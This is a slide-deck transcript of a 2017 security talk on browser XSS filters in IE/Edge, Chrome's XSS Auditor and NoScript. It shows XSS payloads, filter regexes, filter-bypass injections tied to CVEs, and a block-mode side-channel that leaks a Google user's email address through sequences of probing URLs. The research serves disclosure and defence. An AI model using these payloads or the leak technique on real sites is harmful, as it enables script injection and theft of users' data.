Pro Yearly is on sale from $80 to $50! »

USAGE OF XSS FILTER

USAGE OF XSS FILTER

English version of my presentation in Shibuya.XSS techtalk #9.
Japanese version is here: https://speakerdeck.com/masatokinugawa/shibuya-dot-xss-techtalk-number-9

1a5bce24526a7d6f1ab89678df2d673c?s=128

Masato Kinugawa

April 25, 2017
Tweet

Transcript

  1. None
  2. None
  3. ❶ ➌ ❷ ❹ Agenda

  4. None
  5. XSS Filter? https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg onload=alert(1)>"> </body> </html>

  6. XSS Filter? https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg #nload=alert#1#>"> </body> </html>

  7. Support https://addons.mozilla.org/ja/firefox/addon/noscript/

  8. How to Control HTTP/1.1 200 OK Date: Tue, 28 Mar

    2017 06:16:00 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN
  9. X-XSS-Protection

  10. X-XSS-Protection

  11. How to control NoScript X-XSS-Protection

  12. Basic Behavior https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701 <input value=""><svg #nload=alert#1#>"> <input value=""><svg onload=alert(1)>">

  13. Behavior of block mode

  14. Filter Mechanism of IE/Edge <input value=""><svg #nload=alert#1#>"> <input value="<svg #nload=alert#1#>">

    <!-- <svg #nload=alert(1)> --> https://example.com/?q="><svg+onload=alert(1)>
  15. Filter Mechanism of XSS Auditor <input value=""><svg onload=alert(1)>"> <input value="<svg

    onload=alert(1)>"> <!-- <aaa onload=alert(1)> --> https://example.com/?q="><svg+onload=alert(1)>
  16. Filter Mechanism of NoScript https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701

  17. False Positives and Filter <title>&lt;script&gt; - Google Search</title> <script>(function(){window.google={kEI: [...]

    https://www.google.co.jp/search?q=<script>
  18. Filter's Risk <script src=//example.jp/jquery.js></script> <script> if(jQuery){ // Expected }else{ //

    ??? } </script> https://example.com/?<script src=//example.jp/jquery.js></script>
  19. ABUSING FILTER's Replacement Mode

  20. {<a.*?hr{e}f} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}} [...] {(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(&#x?0 *((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53) |(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(&#x?0*((67)|(43)|(99)|(63) );?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&#x?0*((82)|(52)|(114)|(72));?))([\t]| (&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9

    |(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)| A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).} {<BUTTON[ /+\t].*?va{l}ue[ /+\t]*=} {<fo{r}m.*?>} {<OPTION[ /+\t].*?va{l}ue[ /+\t]*=} {<INPUT[ /+\t].*?va{l}ue[ /+\t]*=} [...] {<EM{B}ED[ /+\t].*?((src)|(type)).*?=} {[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.} {<ME{T}A[ /+\t].*?((http-equiv)|(charset))[ /+\t]*=} [...] Filter Regex of IE/Edge "><svg #nload=alert#1#>
  21. Why "><svg #nload=alert#1#> happens [ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=. "><svg[SPACE]onload=alert(1)>

  22. Why "><svg #nload=alert#1#> happens "><svg onload=alert(1)> [\"\'][ ]*(([^a-z0- 9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee]))

    )).+?{\(}.*?{\)} x="";alert(1)//"
  23. XSS using XSS filter means:

  24. Past Discoveries https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU- 2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf http://d.hatena.ne.jp/teracc/20090622

  25. 2015: Rediscoveries https://www.slideshare.net/masatokinugawa/xxn-en

  26. XXN Example [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script> q = "";document#body.innerHTML="<xss>";

    </script> URL: ?q=";document.body.innerHTML="<xss>
  27. XXN Example [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script src> <script src="//example.co.jp/test.js"

    type="text/javascript"> </script> URL: ?"/++.+++=
  28. Mitigation for these attacks mode=block "style=:\ javascript:- vbscript:- vbs:- ",x[]=

    "{toString: "{valueOf: mode=block
  29. Strange fix <script src="//example^co.jp/test.js" type="text/javascript"> </script>

  30. ^ is Safe? window#name// The execution is aborted by the

    syntax error window^name// valid syntax, it is executed as JavaScript window.name <script>
  31. None
  32. XXN using caret (CVE-2016-3212) url=location.search.slice(1); if(url^indexOf(":")!=-1){ url=null; } onload=function(){ if(url){location=url;}

    }
  33. ES6 and XXN https://example.com/?q=";alert`1`// <script> q = "";alert`1`//"; </script> https://www.slideshare.net/x00mario/es6-en/34

    ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else(by Mario Heiderich)
  34. XXN using back-tick characters (CVE-2016-7280) https://example.com/?q=${alert(1)}``//&`+++` https://example.com/?q=[USER_INPUT] <script> foo=``; q="[USER_INPUT]";

    </script> <script> foo=`#; q="${alert(1)}#`//"; </script>
  35. Now, the replacement behavior is safe? https://example.com/?+onfiles+++=. <script src="/comm#nfiles/js/important.js" type="text/javascript">

    </script> [...]
  36. Future replacement mode https://bugs.chromium.org/p/chromium/issues/detail?id=654794

  37. ABUSING FILTER's Block Mode

  38. Past found bugs in block mode http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html window.length ✨

  39. Getting the filter state https://VICTIM/ https://VICTIM/?<xss> IFRAME ERROR https://ATTACKER/ win=window.open(…)

    if(win.length == 0){ //when filter works, //the number of frames is "0" }else{ //normal } <script>…</script>
  40. Mitigations in IE/Edge     

  41. Abusing block mode in Google https://www.youtube.com/watch?v=IMDWjKFbsJE

  42. Checking Google's Homepage HTTP/1.1 200 OK [...] Server: gws X-XSS-Protection:

    1; mode=block X-Frame-Options: SAMEORIGIN ✔ ✔ window.length
  43. Special Conditions(1) https://accounts.google.com/ServiceLogin?

  44. Special Conditions(2) google.ae google.as google.ca google.co google.co.in google.co.jp google.co.kr google.co.nz

    google.co.uk google.com.br google.com.mx google.de google.es google.fr google.it google.pl google.pt google.ru ...(
  45. ✨ Bypassing attempts limitation ✨ ✨

  46. Another important thing {<a.*?hr{e}f}

  47. Investigating filter details 0 <ahref> 1 <aAhref> 2 <aAAhref> 3

    <aAAAhref> 4 <aAAAAhref> 5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/
  48. Investigating filter details 0 <ahref> 1 <aAhref> 2 <aAAhref> 3

    <aAAAhref> 4 <aAAAAhref> 5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> <a%XXhref https://example.com/?<a%2Bhref
  49. Investigating filter details 0 <ahr#f> 1 <aAhr#f> 2 <aAAhr#f> 3

    <aAAAhr#f> 4 <aAAAAhr#f> 5 <aAAAAAhr#f> 6 <aAAAAAAhr#f> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/?<a%2Bhref
  50. 0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_

    A a 0x00 0-9 < B-Z b-z No reaction Result
  51. Result 0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{}

    -.@_ A a 0x00 0-9 < B-Z b-z No reaction
  52. The Target <div class="gb_xb">masatokinugawa@gmail.com</div><div class="gb_pb"> {[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}

  53. Check Conditions ✔ ✔ ✔ ✔

  54. Organizing URL for attacks <div class="gb_xb">masatokinugawa@gmail.com</div><div class="gb_pb">

  55. Getting the number of characters https://www.google.co.jp/?"-------@gmail.com--div--div-class= https://www.google.co.jp/?"--------@gmail.com--div--div-class= https://www.google.co.jp/?"---------@gmail.com--div--div-class= https://www.google.co.jp/?"----------@gmail.com--div--div-class= https://www.google.co.jp/?"-----------@gmail.com--div--div-class=

    https://www.google.co.jp/?"------------@gmail.com--div--div-class= https://www.google.co.jp/?"-------------@gmail.com--div--div-class= https://www.google.co.jp/?"--------------@gmail.com--div--div-class= https://www.google.co.jp/?"---------------@gmail.com--div--div-class=
  56. Getting the characters https://www.google.de/?"-a-------------@gmail.com--div--div-class= https://www.google.de/?"-b-------------@gmail.com--div--div-class= https://www.google.de/?"-c-------------@gmail.com--div--div-class= https://www.google.de/?"-d-------------@gmail.com--div--div-class= https://www.google.de/?"-e-------------@gmail.com--div--div-class= https://www.google.de/?"-f-------------@gmail.com--div--div-class= https://www.google.de/?"-g-------------@gmail.com--div--div-class=

    https://www.google.de/?"-h-------------@gmail.com--div--div-class= https://www.google.de/?"-i-------------@gmail.com--div--div-class= https://www.google.ru/?"-j-------------@gmail.com--div--div-class= https://www.google.ru/?"-k-------------@gmail.com--div--div-class=
  57. https://www.google.ru/?"-l-------------@gmail.com--div--div-class= https://www.google.ru/?"-m-------------@gmail.com--div--div-class= https://www.google.ru/?"-ma------------@gmail.com--div--div-class= https://www.google.ru/?"-maa-----------@gmail.com--div--div-class= https://www.google.ru/?"-mab-----------@gmail.com--div--div-class= https://www.google.ru/?"-mac-----------@gmail.com--div--div-class= https://www.google.ru/?"-mad-----------@gmail.com--div--div-class= https://www.google.ca/?"-mae-----------@gmail.com--div--div-class= ... Getting

    the characters
  58. ✨ ✨ ✨

  59. After the fix

  60. Microsoft's Fix

  61. PROPER USAGE of XSS FILTER

  62. Recommendation of X-XSS-Protection

  63. 0 is dangerous?   

  64. How should we do?  X-XSS- Protection   

     
  65. At the last: Rewards      

  66. None